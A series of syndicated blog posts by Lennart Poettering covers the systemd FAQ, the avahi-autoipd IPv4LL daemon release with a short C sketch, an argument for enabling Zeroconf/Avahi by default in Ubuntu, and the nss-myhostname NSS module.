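          return EXIT_SUCCESS;
  }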

The list above is very similar to what Apple
recommends for daemons compatible with launchd. It should be
easy to extend daemons that already support launchd
activation to support systemd activation as well.

Note that systemd also supports daemons not written in this style
perfectly well, if only for compatibility reasons (launchd has
only limited support for that). As mentioned, this even extends to
existing inetd capable daemons which can be used unmodified for
socket activation by systemd.

So, yes, should systemd prove itself in our experiments and get
adopted by the distributions, it would make sense to port at least
those services that are started by default to use socket or
bus-based activation. We have
written proof-of-concept patches, and the porting turned out
to be very easy. Also, we can leverage the work that has already
been done for launchd, to a certain extent. Moreover, adding
support for socket-based activation does not make the service
incompatible with non-systemd systems.

FAQs

Who’s behind this?
Well, the current code-base is mostly my work, Lennart
Poettering (Red Hat). However, the design in all its details is
the result of close cooperation between Kay Sievers (Novell) and
me. Other people involved are Harald Hoyer (Red Hat), Dhaval
Giani (Formerly IBM), and a few others from various
companies such as Intel, SUSE and Nokia.
Is this a Red Hat project?
No, this is my personal side project. Also, let me emphasize
this: the opinions reflected here are my own. They are not
the views of my employer, or Ronald McDonald, or anyone
else.
Will this come to Fedora?
If our experiments prove that this approach works out, and
discussions in the Fedora community show support for this, then
yes, we’ll certainly try to get this into Fedora.
Will this come to OpenSUSE?
Kay’s pursuing that, so something similar as for Fedora applies here, too.
Will this come to Debian/Gentoo/Mandriva/MeeGo/Ubuntu/[insert your favourite distro here]?
That’s up to them. We’d certainly welcome their interest, and help with the integration.
Why didn’t you just add this to Upstart, why did you invent something new?
Well, the point of the part about Upstart above was to show
that the core design of Upstart is flawed, in our
opinion. Starting completely from scratch suggests itself if the
existing solution appears flawed in its core. However, note that
we took a lot of inspiration from Upstart’s code-base
otherwise.
If you love Apple launchd so much, why not adopt that?
launchd is a great invention, but I am not convinced that it
would fit well into Linux, nor that it is suitable for a system
like Linux with its immense scalability and flexibility to
numerous purposes and uses.
Is this an NIH project?
Well, I hope that I managed to explain in the text above why
we came up with something new, instead of building on Upstart or
launchd. We came up with systemd due to technical
reasons, not political reasons.
Don’t forget that it is Upstart that includes
a library called NIH
(which is kind of a reimplementation of glib) — not systemd!
Will this run on [insert non-Linux OS here]?
Unlikely. As pointed out, systemd uses many Linux-specific
APIs (such as epoll, signalfd, libudev, cgroups, and numerous
more); a port to other operating systems appears to us not to
make a lot of sense. Also, we, the people involved, are
unlikely to be interested in merging possible ports to other
platforms and working with the constraints this introduces. That said,
git supports branches and rebasing quite well, in case
people really want to do a port.
Actually portability is even more limited than just to other OSes: we require a very
recent Linux kernel, glibc, libcgroup and libudev. No support for
less-than-current Linux systems, sorry.
If folks want to implement something similar for other
operating systems, the preferred mode of cooperation is probably
that we help you identify which interfaces can be shared with
your system, to make life easier for daemon writers to support
both systemd and your systemd counterpart. Probably, the focus should be
to share interfaces, not code.
I hear [fill one in here: the Gentoo boot system, initng,
Solaris SMF, runit, uxlaunch, ...] is an awesome init system and
also does parallel boot-up, so why not adopt that?
Well, before we started this we actually had a very close
look at the various systems, and none of them did what we had in
mind for systemd (with the exception of launchd, of course). If
you cannot see that, then please read again what I wrote
above.

Pid Eins: avahi-autoipd Released and ‘State of the Lemur’

This post was syndicated from: Pid Eins and was written by: Lennart Poettering. Original post: at Pid Eins

A few minutes ago I released Avahi 0.6.14
which besides other, minor fixes and cleanups includes a new component avahi-autoipd.
This new daemon is an implementation of IPv4LL (aka RFC3927, aka
APIPA), a method for acquiring link-local IP addresses (those from the range
169.254/16) without a central server, such as DHCP.
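
For illustration, the core of the address selection in IPv4LL is
simple enough to sketch in a few lines of C. This is a simplified
rendering of what RFC 3927 describes, not the actual avahi-autoipd
code; the real daemon's seeding and ARP-based conflict handling are
considerably more involved:

  #include <stdint.h>
  #include <stdio.h>
  #include <stdlib.h>

  /* Pick a pseudo-random candidate from 169.254.1.0 - 169.254.254.255
   * (the first and last /24 of 169.254/16 are reserved). RFC 3927
   * suggests seeding the generator from the interface's MAC address so
   * that a host tends to pick the same address on every boot. The
   * candidate must still be probed with ARP before it may be used. */
  static uint32_t ipv4ll_candidate(unsigned seed) {
          uint32_t host;

          srand(seed);
          host = 0x0100 + (uint32_t) (rand() % (0xFEFF - 0x0100 + 1));

          return (169u << 24) | (254u << 16) | host;
  }

  int main(void) {
          uint32_t a = ipv4ll_candidate(0x00beef42 /* e.g. derived from the MAC */);

          printf("%u.%u.%u.%u\n",
                 (a >> 24) & 0xFF, (a >> 16) & 0xFF, (a >> 8) & 0xFF, a & 0xFF);
          return 0;
  }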

Yes, there are already plenty of Free implementations of this protocol
available. However, this one tries to do it right and integrates well with the
rest of Avahi. For a longer rationale for adding this tool to our distribution
instead of relying on external tools, please read this
mailing list thread.

It is my hope that this tool is quickly adopted by the popular
distributions, which will allow Linux to finally catch up with technology that
has been available in Windows systems since Win98 times. If you’re a
distributor, please follow these notes, which describe how best to
integrate this new tool into your distribution.

Because avahi-autoipd acts as a dhclient plug-in by default,
and only activates itself as a last resort for acquiring an IP address, I hope
that it will get in the way of the user much less than previous implementations
of this technology for Linux.

State of the Lemur

Almost 22 months after my first SVN commit to the flexmdns (which was the
name I chose for my mDNS implementation when I first started to work on it)
source code repository, 18 months after Trent and I decided to join our two
projects under the name “Avahi” and 12 months after the release of Avahi 0.1,
it’s time for a little “State of the Lemur” post.

To make it short: Avahi is ubiquitous in the Free Software world. ;-)

All major (Debian, Ubuntu, Fedora, Gentoo, Mandriva, OpenSUSE) and many
minor distributions have it. A quick Google-based poll I did a few weeks ago
shows that it is part of at least 19 different
distributions, including a range of embedded ones. The list of applications
making native use of the Avahi client API is growing, currently at 31
items. That list does not include the legacy HOWL applications and the
applications that use our Bonjour compatibility API which can run on top of
Avahi, hence the real number of applications that can make use of Avahi is
slightly higher. The first commercial hardware appliances which include Avahi are
slowly appearing on the market. I know of at least three such products, one
being Bubba.

If you package Avahi for a distribution, add Avahi support to an
application, or build a hardware appliance with Avahi, please make sure to add
an item to the respective lists linked above; it's a Wiki. Thank you!
(Anonymous registration, without a mail address, is required, though.)

Pid Eins: ZeroConf in Ubuntu

This post was syndicated from: Pid Eins and was written by: Lennart Poettering. Original post: at Pid Eins

(Disclaimer: I am not an Ubuntu user myself. But I happen to be the lead developer of Avahi.)

It came to my attention that Ubuntu is discussing whether to
enable Zeroconf/Avahi in default installations. I would like to point out a few
things:

The “No Open Ports” policy: This policy (or at least the
way many people interpret it) seems to be thought out by someone who
doesn’t have much experience with TCP/IP networking. While it might make sense
to enforce this for application-level protocols like HTTP or FTP it doesn’t
make sense to apply it to transport-level protocols such as DHCP, DNS or in
this case mDNS (the underlying protocol of Zeroconf/Avahi/Bonjour):

  • Even the simplest DNS lookup requires the opening of a UDP port for a
    short period of time to be able to receive the response. This is usually not
    visible to the administrator, because the time is too short to show up in
    netstat -uln, but nonetheless it is an open port. (UDP is not
    session-based (like TCP is), so incoming packets are accepted regardless of where
    they come from.)
  • DHCP clients listen on UDP port 68 during their entire lifetime (which in
    most cases is the same as the uptime of the machine). DHCP may be misused for
    much worse things than mDNS. Evildoers can forge DHCP packets to change IP
    addresses and routing of machines. This is definitely something that cannot be
    done with mDNS.

All three protocols, DNS, DHCP and mDNS, require a little bit of trust in
the local LAN. They (usually) don’t come with any sort of authentication and
they all are very easy to forge. The impact of forged mDNS packets is clearly
less dangerous than forged DHCP or DNS packets. Why? Because mDNS doesn’t
allow you to change the IP address or routing setup (which forged DHCP allows)
and because it cannot be used to spoof host names outside the .local
domain (which forged DNS allows).

Enforcing the “No Open ports” policy everywhere in Ubuntu would require that
both DNS and DHCP are disabled by default. However, as everybody probably
agrees, this would be ridiculous because a standard Ubuntu installation
couldn’t even be used for the most basic things like web browsing.

Oh, and BTW: DNS lookups are usually done by an NSS plugin which is loaded
by the libc into every process which uses gethostbyname() (the function for doing host name resolutions). So, in
effect every single process that uses this function has an open port for a
short time. And the DNS client code runs with user privileges, so an exploit
really hurts. dhclient (the DHCP client) runs as root during its entire
runtime, so an exploit of it hurts even more. Avahi, in contrast, runs as its own user and
chroot()s.

It is not my intention to force anyone to use my
software. However, enforcing the “No Open Ports” policy unconditionally is
not a good idea. Currently Ubuntu makes exceptions for DHCP/DNS and so
it should for mDNS.

I do agree that publishing all kinds of local services with Avahi in a
default install is indeed problematic. However, if the “No Open Ports” policy
is enforced on all other application-level software, there shouldn’t be any
application that would want to register a service with Avahi.

Starting Avahi “on-demand” is not an option either, because it offers useful
services even when no local application is accessing it. Most notably this is
host name resolution for the local host name. (Hey, yeah, Zeroconf is more than
just stealing music.)

Remember: Zeroconf is about
Zero Configuration. Requiring the user to toggle some obscure
configuration option before he can use Zeroconf would make it a paradox.
Zeroconf was designed to make things “just work”. If it isn’t enabled by
default it is impossible to reach that goal.

Oh, and I enabled commenting in my blog, if anyone wants to flame me on this…

Pid Eins: Introducing nss-myhostname

This post was syndicated from: Pid Eins and was written by: Lennart Poettering. Original post: at Pid Eins

I am doing a lot of embedded Linux work lately. The machines we use configure their hostname depending on some external configuration options. They boot from a CF card, which is mostly mounted read-only. Since the hostname changes often but we wanted to use sudo we had a problem: sudo requires the local host name to be resolvable using gethostbyname(). On Debian this is usually done by patching /etc/hosts correctly. Unfortunately that file resides on a read-only partition. Instead of hacking some ugly symlink based solution I decided to fix it the right way and wrote a tiny NSS module which does nothing more than mapping the hostname to the IP address 127.0.0.2 (and back). (That IP address is on the loopback device, but is not identical to localhost.)
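
A quick way to check the behaviour described above is a few lines of
C: with nss-myhostname installed and listed for the hosts database in
/etc/nsswitch.conf, the lookup below (which is essentially what sudo
needs) succeeds and returns 127.0.0.2 even though /etc/hosts was
never touched. This is just an illustrative test program, not part of
the module itself:

  #include <stdio.h>
  #include <unistd.h>
  #include <netdb.h>
  #include <arpa/inet.h>

  int main(void) {
          char name[256];
          struct hostent *he;

          if (gethostname(name, sizeof(name)) < 0)
                  return 1;

          /* This is the resolution sudo needs; nss-myhostname answers it
           * with 127.0.0.2 without any entry in /etc/hosts. */
          he = gethostbyname(name);
          if (!he) {
                  fprintf(stderr, "Cannot resolve %s\n", name);
                  return 1;
          }

          printf("%s -> %s\n", name, inet_ntoa(*(struct in_addr *) he->h_addr_list[0]));
          return 0;
  }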

Get nss-myhostname while it is hot!

BTW: This tool I wrote is pretty useful on embedded machines too, and certainly easier to use than setterm -dump 1 -file /dev/stdout | fold -w 80. And it does color too. And looping. And is much cooler anyway.